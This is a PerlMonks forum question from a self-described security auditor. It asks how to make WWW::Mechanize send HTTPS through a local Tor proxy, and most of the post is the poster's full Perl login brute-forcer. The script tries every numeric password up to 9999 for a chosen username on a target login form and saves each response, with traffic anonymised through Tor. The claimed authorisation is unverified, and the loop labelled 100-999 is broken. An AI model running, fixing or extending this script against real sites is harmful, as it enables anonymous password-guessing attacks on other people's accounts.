Beefy Boxes and Bandwidth Generously Provided by pair Networks
We don't bite newbies here... much
 
PerlMonks  

comment on

( [id://3333]=superdoc: print w/replies, xml ) Need Help??
Kind Monks,
I have a rather peculiar problem. Before I get to it, let me describe my situation(or you can skip to 'PROBLEM'), so you may understand my intentions are noble. I am a security auditor for my company, and my task is to find the vulnerable holes before malicious hackers do. My current project involves auditing their timesheet login page. My goal is to test for weak passwords, namely, the numeric possibilities from 1-9999(I have my own list of usernames). I have coded a rudimentary Perl program that handles the requests and logs the requests nicely. However, I am requested to perform the audit from an outsider's perspective, ie, no prior knowledge of the company. In keeping with the spirit of my directive, I'm using Tor to anonymize the connections. Tor runs as a proxy on localhost, and redirects the connections from there. It handles HTTP and HTTPS fine on my web browser, but not with my script. That brings me to my...

PROBLEM:
I cannot get SSL connections to use a proxy specified through WWW:Mechanize. HTTP connections appear to correctly filter through the proxy. Proxy is running on 127.0.0.1:8118, and handles HTTP/HTTPS fine. Netmon confirms these suspicions about TCP/SSL traffic from my script being handled differently.

SOLUTIONS ATTEMPTED:
1. Setting HTTP_Proxy and HTTPS_Proxy environment variables by hand
2. Using 'use Crypt:SLLeay'
3. Trying alternate proxy (web proxies)
What follows is the code for my program (naturally sanitized to remove sensitive info). I have searched far and wide for the answer, but cannot get a working solution. Monks, can you help me? It would be most appreciated. CODE:

#!/usr/bin/perl #Thanks to IBM for helping to create this - Bret Sweeden especially #NBTDOTM use WWW::Mechanize; use HTTP::Cookies; #$ENV{HTTPS_PROXY} = '127.0.0.1:8118'; #$ENV{HTTP_PROXY} = '127.0.0.1:8118'; #Determine the number of arguments the user has given us $NumArgs = $#ARGV + 1; if ($NumArgs == 0) { #Our user has not entered any information. Display help screen. header(); exit();} elsif ($NumArgs == 1) { #Our user has only entered some information. Display help screen. header(); exit();} if ($NumArgs == 2) { #Our user has entered enough for an attack. Begin! $host = $ARGV[0]; #Host is the first argument supplied $user = $ARGV[1]; #Username is the 2nd argument supplied #Display header print qq{ ---------------------------------------------------------------------- Login Brute-Forcer Custom Built by Juno NBTDOTM ---------------------------------------------------------------------- }; print "\nYour host is: $host"; print "\nYour username is: $user"; print "\n\nThe program will now try bruteforcing the host you selected +"; my $url = $host; my $username = $user; #1-9 for $i (1 .. 9) { print "\nTrying password 000$i..."; my $outfile = "000" . $i . ".htm"; my $password = "000" . $i; my $mech = WWW::Mechanize->new(); $mech->cookie_jar(HTTP::Cookies->new()); $mech->proxy(['http', 'https'], 'http://127.0.0.1:8118/', 'https:/ +/127.0.0.1:8118/'); $mech->get($url); $mech->field(j_username => $username); $mech->field(j_password => $password); $mech->click(); $mech->click(); my $output_page = $mech->content(); open(OUTFILE, ">$outfile"); print OUTFILE "$output_page"; close(OUTFILE); print " Done."; } #10-99 for $i (10 .. 99) { print "\nTrying password 00$i..."; my $outfile = "00" . $i . ".htm"; my $password = "00" . $i; my $mech = WWW::Mechanize->new(); $mech->cookie_jar(HTTP::Cookies->new()); $mech->get($url); #$mech->form_name('j'); $mech->field(j_username => $username); $mech->field(j_password => $password); $mech->click(); $mech->click(); my $output_page = $mech->content(); open(OUTFILE, ">$outfile"); print OUTFILE "$output_page"; close(OUTFILE); print " Done."; } #100-999 for $i (1 .. 9) { print "\nTrying password 0$i..."; my $outfile = "0" . $i . ".htm"; my $password = "0" . $i; my $mech = WWW::Mechanize->new(); $mech->cookie_jar(HTTP::Cookies->new()); $mech->get($url); #$mech->form_name('j'); $mech->field(j_username => $username); $mech->field(j_password => $password); $mech->click(); $mech->click(); my $output_page = $mech->content(); open(OUTFILE, ">$outfile"); print OUTFILE "$output_page"; close(OUTFILE); print " Done."; } #1000-9999 for $i (1000 .. 9999) { print "\nTrying password $i..."; my $outfile = $i . ".htm"; my $password = $i; my $mech = WWW::Mechanize->new(); $mech->cookie_jar(HTTP::Cookies->new()); $mech->get($url); #$mech->form_name('j'); $mech->field(j_username => $username); $mech->field(j_password => $password); $mech->click(); $mech->click(); my $output_page = $mech->content(); open(OUTFILE, ">$outfile"); print OUTFILE "$output_page"; close(OUTFILE); print " Done."; } } print "\n\nAudit complete!"; exit(); sub header{ print qq{ ---------------------------------------------------------------------- Login Brute-Forcer Custom Built by Juno NBTDOTM ---------------------------------------------------------------------- Usage: GHGbrute -[target site] -[user] Example: GHGbrute somesite.com -admin The program will attempt a numerical bruteforce to four places. }; }


In reply to Using Mech with HTTPS by Juno

Title:
Use:  <p> text here (a paragraph) </p>
and:  <code> code here </code>
to format your post; it's "PerlMonks-approved HTML":



  • Are you posting in the right place? Check out Where do I post X? to know for sure.
  • Posts may use any of the Perl Monks Approved HTML tags. Currently these include the following:
    <code> <a> <b> <big> <blockquote> <br /> <dd> <dl> <dt> <em> <font> <h1> <h2> <h3> <h4> <h5> <h6> <hr /> <i> <li> <nbsp> <ol> <p> <small> <strike> <strong> <sub> <sup> <table> <td> <th> <tr> <tt> <u> <ul>
  • Snippets of code should be wrapped in <code> tags not <pre> tags. In fact, <pre> tags should generally be avoided. If they must be used, extreme care should be taken to ensure that their contents do not have long lines (<70 chars), in order to prevent horizontal scrolling (and possible janitor intervention).
  • Want more info? How to link or How to display code and escape characters are good places to start.
Log In?
Username:
Password:

What's my password?
Create A New User
Domain Nodelet?
Chatterbox?
and the web crawler heard nothing...

How do I use this?Last hourOther CB clients
Other Users?
Others perusing the Monastery: (9)
As of 2024-03-28 10:13 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?

    No recent polls found